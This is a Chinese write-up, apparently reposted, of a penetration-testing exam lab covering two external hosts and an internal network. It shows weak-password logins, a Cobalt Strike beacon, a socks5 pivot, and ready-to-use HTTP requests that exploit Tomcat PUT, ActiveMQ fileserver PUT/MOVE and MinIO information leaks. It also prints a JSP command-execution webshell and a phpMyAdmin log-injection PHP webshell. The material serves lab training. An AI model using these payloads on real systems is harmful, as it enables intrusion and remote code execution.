渗透测试考核--两层内网 cs windows socks5

news2024/11/19 7:42:32

这里考核为渗透

这里是网络拓扑图

这里记录一下

两台外网

两台内网

首先拿到C段 nmap进行扫描

外网1

nmap -p 80  172.16.17.2/24 

主机存活 一般都是web服务入手 所以我们指定80端口 然后去查找开放的

最后获取到2个ip

Nmap scan report for 172.16.17.177
Host is up (0.045s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 9C:B6:D0:6D:50:71 (Rivet Networks)

Nmap scan report for 172.16.17.134
Host is up (0.050s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 9C:B6:D0:6D:50:71 (Rivet Networks)

我们首先查看 177的ip

扫描全端口

再扫描的时候 我们去看看web服务

发现是织梦

这里我们学过 我们拼接 dede 可以直接跳转到管理员

 弱口令爆破一波 为 admin/1q2w3e4r

然后可以直接getshell

GETSHELL

进入文件管理 然后就可以上传文件

 然后我们可以通过哥斯拉的zip模式 将网站down下来

然后使用命令查看flag

grep -r flag /路径

但是发现都是内容 看的眼睛难受 我们自己来获取吧

内网获取就去看看数据库

搜了一下织梦的database在哪里

C:/phpstudy_pro/WWW/data/common.inc.php

哥斯拉中链接

然后这里因为是window我们考虑使用cs上线

CS上线

链接:https://pan.baidu.com/s/1mpu0W5almTLXBtm7S6ZTyQ?pwd=h3kr
提取码:h3kr
--来自百度网盘超级会员V3的分享

上面是cs的链接

这里进行演示 这里我是使用wsl的虚拟机系统 如果是vm也是一样操作

这里也介绍一下cs的使用

首先是启动

这里列举两个方式 首先是windows 然后就是linux

java 环境需要11以上

.\teamserver 172.16.17.13 123

 然后cs上线

然后我们开始设置监听

端口随便写就行了

开始生成木马

执行木马

上线成功 我们开始查看基本信息

首先设置回连

修改为0

然后在我们的会话中执行

shell ipconfig

发现二层内网

这里进行查看存活

经过发现 这里只有 192存在其他主机 所以我们开始扫192的

主机发现成功了

然后就发现存在

8080   9001 9000 80  8161这些端口 

现在开始做代理

对了这里的flag在 用户的文档下可以找到

 然后我们开始搞代理

我们这里使用 

Venom 建立 socks5代理

我们的主机执行


./admin.exe -lport 5678


靶机执行 

agent.exe  -rhost 172.16.17.13 -rport 5678


然后再admin就会回显


show info


goto 1

socks 1080

即可实现socks5代理 

然后我们就实现建立socks5代理

然后我们通过浏览器的代理设置 即可访问 192.168.31.131的web服务

ubuntu内网- web1 Apache Tomcat/8.5.19

 搜一下有什么漏洞

发现存在一个文件写入漏洞

需要bp的帮助 这里顺便设置一下bp的socks5代理

然后我们浏览器开 bp抓包 就会从 8080 走到 1080 然后就可以实现

然后我们开始复现

首先在主页刷新抓包

 修改为下面的请求包 然后这里 jsp 后面加 / 是为了绕过检测 否则无法上传

PUT /1.jsp/ HTTP/1.1
Host: 192.168.31.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

jsp的一句话木马
HTTP/1.1 201 
Content-Length: 0
Date: Tue, 28 Nov 2023 13:24:01 GMT
Connection: close

上传成功 我们直接访问即可

getshell  然后通过哥斯拉访问(我这个是哥斯拉马)

记得配置socks5代理

flag在 根目录

ubuntu内网- web2 shiro

这里我们开始看8080端口

 然后我们抓包

 发现shiro框架 remember

直接工具一把锁

配置工具代理

直接getshell了 flag也在根目录

ubuntu内网- web3 activemq

8161端口

这里存在登入

 这里存在manage 点击 发现 登入 弱口令 admin/admin

实现登入

 发现 5.11.1版本 搜索 发现文件上传漏洞

这里我们需要去看我们的路径

http://192.168.31.131:8161/admin/test/systemProperties.jsp

 记住绝对路径

然后通过bp进行抓包

修改为下面的内容 (这里需要先登入后台)

PUT /fileserver/1.txt HTTP/1.1
Host: 192.168.31.131:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 13 Feb 2015 18:05:11 GMT

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

 while((line=br.readLine())!=null){
  out.print(line+"</br>");
 }
HTTP/1.1 204 No Content
Connection: close
Server: Jetty(8.1.16.v20140903)

上传成功 但是去访问是没有的 我们通过 move 的协议 将他移动到 api下

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: 192.168.31.131:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 13 Feb 2015 18:05:11 GMT
Content-Length: 328

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

这里的 destination 是我们刚刚的获取的路径 然后加上 后面的路径实现移动

这里我的回显是

HTTP/1.1 204 No Content
Connection: close
Server: Jetty(8.1.16.v20140903)

然后去到 /api/s.jsp下

执行命令

http://192.168.31.131:8161/api/s.jsp?cmd=ls

一样 cat /flag 

ubuntu内网- web4 minio

9001端口

为minio 我们去查看一下有什么漏洞

 发现存在信息泄露 

然后这里的请求包

注意这里的内容 需要修改为 9000 (原本的minio是 9001)

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.31.131:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 28 Nov 2023 13:43:22 GMT

 

用户密码 全部泄露 直接登入即可

然后flag在 容器里

这里我们就打通了 3台机器

然后这里还存在 一台外网机器

我们开始打

外网2

这里通过扫描 可以发现 134还存在 一台靶机

发现403 说明存在内容 但是没有 我们开始目录扫描

这里使用 dirsearch

然后我们去访问 发现phpmyadmin 存在弱口令 root root 登入后台

然后我们flag 就存在 admin下

 然后我们去搜 phpadmin 如何getshell 这里选择日志注入

select @@datadir;

查看路径

show variables like '%general%';


查看日志功能


SET GLOBAL general_log='on';

SHOW VARIABLES LIKE '%general%';


开启日志


然后我们通过指定日志写入地址 实现注入

获取到地址 然后开始写入

这里还有一个获取地址的方法

通过php探针 我们在上面扫到了 l.php 去访问一下

set global general_log_file ='C:\\phpstudy_pro\\WWW\\shell.php'

然后我们去访问一下

然后写入木马

select '<?php @eval($_POST[cmd]);?>'

getshell 了 然后去看内网 flag就两个是在 源代码中 另一个在user的文档中

这里考核的渗透就实现了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1264013.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

泛微 E-Office sample权限绕过+文件上传组合漏洞Getshell

0x01 产品简介 泛微E-Office是一款标准化的协同 OA 办公软件&#xff0c;泛微协同办公产品系列成员之一,实行通用化产品设计&#xff0c;充分贴合企业管理需求&#xff0c;本着简洁易用、高效智能的原则&#xff0c;为企业快速打造移动化、无纸化、数字化的办公平台。 0x02 漏…

整车测试中的UDS诊断

UDS&#xff08;Unified Diagnostic Services&#xff0c;统一的诊断服务&#xff09;诊断协议是在汽车电子ECU环境下的一种诊断通信协议。这种通信协议被用在几乎所有由OEM一级供应商所制造的新ECU上面。这些ECU控制车辆的各种功能&#xff0c;包括电控燃油喷射系统&#xff0…

M3VSNET:无监督多度量多视图立体视觉网络(2021年)

M3VSNET&#xff1a;无监督多度量多视图立体视觉网络&#xff08;2021年&#xff09; 摘要1 引言2 相关工作3 实现方法3.1 网络架构 B. Huang, H. Yi, C. Huang, Y. He, J. Liu and X. Liu, “M3VSNET: Unsupervised Multi-Metric Multi-View Stereo Network,” 2021 IEEE Inte…

02-Java集合之双列集合,如HashMap,Hashtable,Properties,TreeMap的底层结构

双列集合 添加/获取/删除键值对原理 哈希表/散列表是一种将数组和单向链表融合在一起的数据结构 数组在查询方面效率很高,单向链表在随机增删方面效率较高,哈希表将以上的两种数据结构融合在一起后充分发挥它们各自的优点 双列集合以key和value这种键值对方式存储数据: key…

【算法】七大经典排序(插入,选择,冒泡,希尔,堆,快速,归并)(含可视化算法动图,清晰易懂,零基础入门)

​ 目录 一、排序的概念及其运用1.1 排序的概念1.2 排序的应用1.3 常见的排序算法 二、常见排序算法的实现2.1 插入排序2.1.1 直接插入排序2.1.2 希尔排序2.1.3 直接插入排序和希尔排序的性能对比 2.2 选择排序2.2.1 直接选择排序2.2.2 堆排序2.2.3 直接选择排序和堆排序的性能…

会声会影2024旗舰版系统配置要求及格式支持

会声会影2024旗舰版是一款广受欢迎的视频编辑软件&#xff0c;它的最新版本&#xff0c;会声会影2023&#xff0c;已经发布。在这篇文章中&#xff0c;我们将探讨会声会影2024旗舰版系统配置要求及格式支持 会声会影2024是一款专业的视频剪辑软件&#xff0c;能够帮助用户制作高…

写一个宏,交换整数二进制位的奇数位和偶数位,并打印这个新的数

我们已经学过了C语言的宏&#xff0c;我们今天应用宏来交换一个整数的二进制的奇数位和偶数位&#xff0c;并得到这个被交换过的数&#xff0c;我们开始吧&#xff01; 1.问题分析 解题方法&#xff1a;& 和<< 和>>操作符 问题解析&#xff1a;我们这里假设一个…

医保移动支付程序开发

作为公司最苦命的开发&#xff0c;年初接到任务开发医保移动支付程序&#xff08;微信小程序和支付宝小程序&#xff09;&#xff0c;为医疗机构提供线上医保结算。好家伙&#xff0c;我一看解压后资料大于一个G&#xff0c;内心无比的惊慌。 一、技术流程图 图太大了显示不全需…

入门必读:Figma软件的功能和用途一览!

1、Figma软件是做什么的 Figma软件奠定了在线设计工具的形式&#xff0c;产品UI设计功能非常强大&#xff0c;Figma软件基于web操作&#xff0c;无论是macos、windows可以使用这个软件&#xff0c;即使有电脑、浏览器、网络&#xff0c;甚至软件也不需要下载&#xff0c;节省了…

C语言枚举的作用是什么?

我在知乎上看到这个问题&#xff0c;一开始&#xff0c;也有一些疑惑&#xff0c;后面查了一些资料&#xff0c;对于这个问题&#xff0c;简单的说一下我的看法。 枚举有多大 枚举类型到底有多大&#xff0c;占多少空间呢&#xff1f;这个要具体情况具体分析&#xff0c;编译器…

基于ssm框架的公寓租房系统设计与实现

基于ssm框架的公寓租房系统的设计与实现 摘要&#xff1a;在互联网技术的不断发展壮大的背景下,人们生活水平及经济水平也随之得到提上&#xff0c;许多商家都纷纷吧自己的业务重心偏移到网络这个大蛋糕上&#xff0c;为了迎合时代的发展&#xff0c;房屋的出租业务也应该将重…

将测试速度提升数倍!RunnerGo测试平台——您的UI自动化测试利器!

RunnerGo提供从API管理到API性能再到可视化的API自动化、UI自动化测试功能模块&#xff0c;覆盖了整个产品测试周期。 RunnerGo UI自动化基于Selenium浏览器自动化方案构建&#xff0c;内嵌高度可复用的测试脚本&#xff0c;测试团队无需复杂的代码编写即可开展低代码的自动化…

Windows下Linkis1.5DSS1.1.2本地调试

1 Linkis: 参考&#xff1a; 单机部署 | Apache Linkis技术分享 | 在本地开发调试Linkis的源码 (qq.com)DataSphere Studio1.0本地调试开发指南 - 掘金 (juejin.cn) 1.1 后端编译 参考【后端编译 | Apache Linkis】】 修改linkis模块下pom.xml,将mysql.connetor.scope修改…

LeetCode Hot100 84.柱状图中最大的矩形

题目&#xff1a; 给定 n 个非负整数&#xff0c;用来表示柱状图中各个柱子的高度。每个柱子彼此相邻&#xff0c;且宽度为 1 。 求在该柱状图中&#xff0c;能够勾勒出来的矩形的最大面积。 方法&#xff1a; 代码&#xff1a; class Solution {public int largestRectang…

vue项目中通过vuex管理数据

目录 1.前言&#xff1a; 2.vuex的基础用法&#xff1a; 1.构建与挂载vue 基础模板渲染 构建仓库 2.mutations的使用 1.介绍 ​编辑 2.案列&#xff1a; 3.传参 4.辅助函数mapMutations&#xff1a; 3.module分对象的写法 介绍 建立模块&#xff1a; 访问数据的方…

SPSS生存分析:寿命表分析

前言&#xff1a; 本专栏参考教材为《SPSS22.0从入门到精通》&#xff0c;由于软件版本原因&#xff0c;部分内容有所改变&#xff0c;为适应软件版本的变化&#xff0c;特此创作此专栏便于大家学习。本专栏使用软件为&#xff1a;SPSS25.0 本专栏所有的数据文件请点击此链接下…

PostgreSQL | EXTRACT | 获取时间的年月日字串

EXTRACT EXTRACT 函数是 PostgreSQL 中用于从日期和时间类型中提取特定部分&#xff08;如年、月、日、小时等&#xff09;的函数。 格式 EXTRACT(field FROM source) -- field 参数是要提取的部分&#xff0c;例如 YEAR、MONTH、DAY、HOUR 等。 -- source 参数是包含日期或…

计算机网络高频面试八股文

目录&#xff1a; 网络分层结构三次握手两次握手可以吗&#xff1f;四次挥手第四次挥手为什么要等待2MSL&#xff1f;为什么是四次挥手&#xff1f;TCP有哪些特点&#xff1f;说说TCP报文首部有哪些字段&#xff0c;其作用又分别是什么&#xff1f;TCP和UDP的区别&#xff1f;…

Unity 关于生命周期函数的一些认识

Unity 生命周期函数主要有以下一些&#xff1a; Awake(): 在脚本被加载时调用。用于初始化对象的状态和引用。 OnEnable(): 在脚本组件被启用时调用。在脚本组件被激活时执行一次&#xff0c;以及在脚本组件被重新激活时执行。 Reset(): 在脚本组件被重置时调用。用于重置脚本…

11.27二叉查找树,遍历二叉树,层序(判断是不是完全二叉树),根据遍历序列重构二叉树,递归输入建树(树的定义,结构体细节,typedef)

如果left<right&#xff0c;就表明其之间还有元素&#xff0c;即左右指针重合&#xff0c;区间只有一个元素也被包含其中&#xff1b; left<right,就表明递归过程中&#xff0c;只允许区间有两个及以上的元素&#xff0c;不允许区间只有一个元素&#xff0c;那么对应地&…